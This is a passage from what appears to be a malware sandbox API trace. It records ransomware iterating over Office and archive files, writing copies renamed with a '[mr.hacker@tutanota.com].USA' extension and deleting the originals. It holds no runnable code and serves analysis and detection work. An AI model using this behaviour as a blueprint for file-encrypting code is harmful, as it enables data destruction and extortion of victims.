returned -1 [0034.606] lstrlenW (lpString=".pdf") returned 4 [0034.606] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString=".xls") returned 4 [0034.606] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString=".xlsx") returned 5 [0034.606] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.606] lstrlenW (lpString=".ppt") returned 4 [0034.606] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.606] lstrlenW (lpString=".zip") returned 4 [0034.606] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.606] lstrlenW (lpString=".rar") returned 4 [0034.606] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString=".bz2") returned 4 [0034.606] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString=".7z") returned 3 [0034.606] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.606] lstrlenW (lpString=".dbf") returned 4 [0034.606] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.606] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString=".1cd") returned 4 [0034.607] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString=".jpg") returned 4 [0034.607] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString=".doc") returned 4 [0034.607] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString=".docx") returned 5 [0034.607] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0034.607] lstrlenW (lpString=".pdf") returned 4 [0034.607] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString=".xls") returned 4 [0034.607] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString=".xlsx") returned 5 [0034.607] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0034.607] lstrlenW (lpString=".ppt") returned 4 [0034.607] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString=".zip") returned 4 [0034.607] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.607] lstrlenW (lpString=".rar") returned 4 [0034.607] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString=".bz2") returned 4 [0034.607] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString=".7z") returned 3 [0034.607] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.607] lstrlenW (lpString=".dbf") returned 4 [0034.607] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.607] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.608] lstrlenW (lpString=".1cd") returned 4 [0034.608] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.608] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0034.608] lstrlenW (lpString=".jpg") returned 4 [0034.608] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.608] lstrcmpiW (lpString1=".chm", lpString2=".USA") returned -1 [0034.608] lstrlenW (lpString="pss10r.chm") returned 10 [0034.608] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.609] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=27195) returned 1 [0034.609] CloseHandle (hObject=0x17c) returned 1 [0034.609] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0034.609] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.609] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.609] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.609] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.609] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.610] GetLastError () returned 0x0 [0034.610] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0034.614] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0034.615] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.615] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0034.805] SetEndOfFile (hFile=0x180) returned 1 [0034.805] CloseHandle (hObject=0x180) returned 1 [0034.806] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.806] SetEndOfFile (hFile=0x17c) returned 1 [0034.807] CloseHandle (hObject=0x17c) returned 1 [0034.807] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.814] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString=".doc") returned 4 [0034.815] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString=".docx") returned 5 [0034.815] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0034.815] lstrlenW (lpString=".pdf") returned 4 [0034.815] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString=".xls") returned 4 [0034.815] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString=".xlsx") returned 5 [0034.815] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0034.815] lstrlenW (lpString=".ppt") returned 4 [0034.815] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString=".zip") returned 4 [0034.815] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString=".rar") returned 4 [0034.815] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString=".bz2") returned 4 [0034.815] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.815] lstrlenW (lpString=".7z") returned 3 [0034.815] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString=".dbf") returned 4 [0034.815] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString=".1cd") returned 4 [0034.815] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.815] lstrlenW (lpString=".jpg") returned 4 [0034.816] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString=".doc") returned 4 [0034.816] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString=".docx") returned 5 [0034.816] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0034.816] lstrlenW (lpString=".pdf") returned 4 [0034.816] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString=".xls") returned 4 [0034.816] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString=".xlsx") returned 5 [0034.816] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0034.816] lstrlenW (lpString=".ppt") returned 4 [0034.816] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString=".zip") returned 4 [0034.816] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString=".rar") returned 4 [0034.816] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString=".bz2") returned 4 [0034.816] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.816] lstrlenW (lpString=".7z") returned 3 [0034.816] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString=".dbf") returned 4 [0034.816] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString=".1cd") returned 4 [0034.816] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0034.816] lstrlenW (lpString=".jpg") returned 4 [0034.816] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.817] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.817] lstrlenW (lpString="branding.xml") returned 12 [0034.817] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.986] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=596341) returned 1 [0034.986] CloseHandle (hObject=0x1a4) returned 1 [0034.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0034.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.987] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.987] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.987] GetLastError () returned 0x0 [0034.987] ReadFile (in: hFile=0x1a4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x91975, lpOverlapped=0x0) returned 1 [0035.004] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x91980, lpOverlapped=0x0) returned 1 [0035.026] ReadFile (in: hFile=0x1a4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.026] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.026] SetEndOfFile (hFile=0x17c) returned 1 [0035.026] CloseHandle (hObject=0x17c) returned 1 [0035.031] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.031] SetEndOfFile (hFile=0x1a4) returned 1 [0035.304] CloseHandle (hObject=0x1a4) returned 1 [0035.305] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.305] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0035.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.305] lstrlenW (lpString=".doc") returned 4 [0035.305] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.305] lstrlenW (lpString=".docx") returned 5 [0035.305] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.305] lstrlenW (lpString=".pdf") returned 4 [0035.305] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.305] lstrlenW (lpString=".xls") returned 4 [0035.305] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.305] lstrlenW (lpString=".xlsx") returned 5 [0035.305] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.305] lstrlenW (lpString=".ppt") returned 4 [0035.305] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString=".zip") returned 4 [0035.306] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.306] lstrlenW (lpString=".rar") returned 4 [0035.306] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString=".bz2") returned 4 [0035.306] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString=".7z") returned 3 [0035.306] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString=".dbf") returned 4 [0035.306] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString=".1cd") returned 4 [0035.306] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString=".jpg") returned 4 [0035.306] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.306] lstrlenW (lpString=".doc") returned 4 [0035.306] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString=".docx") returned 5 [0035.306] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.306] lstrlenW (lpString=".pdf") returned 4 [0035.306] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString=".xls") returned 4 [0035.306] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.306] lstrlenW (lpString=".xlsx") returned 5 [0035.306] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.307] lstrlenW (lpString=".ppt") returned 4 [0035.307] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.307] lstrlenW (lpString=".zip") returned 4 [0035.307] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.307] lstrlenW (lpString=".rar") returned 4 [0035.307] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.307] lstrlenW (lpString=".bz2") returned 4 [0035.307] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.307] lstrlenW (lpString=".7z") returned 3 [0035.307] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.307] lstrlenW (lpString=".dbf") returned 4 [0035.307] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.307] lstrlenW (lpString=".1cd") returned 4 [0035.307] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.307] lstrlenW (lpString=".jpg") returned 4 [0035.307] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.307] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.307] lstrlenW (lpString="Content.xml") returned 11 [0035.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.496] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=27045) returned 1 [0035.496] CloseHandle (hObject=0x1b4) returned 1 [0035.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0035.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.496] lstrlenW (lpString=".doc") returned 4 [0035.496] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString=".docx") returned 5 [0035.497] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.497] lstrlenW (lpString=".pdf") returned 4 [0035.497] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString=".xls") returned 4 [0035.497] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString=".xlsx") returned 5 [0035.497] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.497] lstrlenW (lpString=".ppt") returned 4 [0035.497] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString=".zip") returned 4 [0035.497] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.497] lstrlenW (lpString=".rar") returned 4 [0035.497] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString=".bz2") returned 4 [0035.497] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString=".7z") returned 3 [0035.497] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString=".dbf") returned 4 [0035.497] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString=".1cd") returned 4 [0035.497] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString=".jpg") returned 4 [0035.497] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.497] lstrlenW (lpString=".doc") returned 4 [0035.498] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString=".docx") returned 5 [0035.498] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.498] lstrlenW (lpString=".pdf") returned 4 [0035.498] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString=".xls") returned 4 [0035.498] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString=".xlsx") returned 5 [0035.498] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 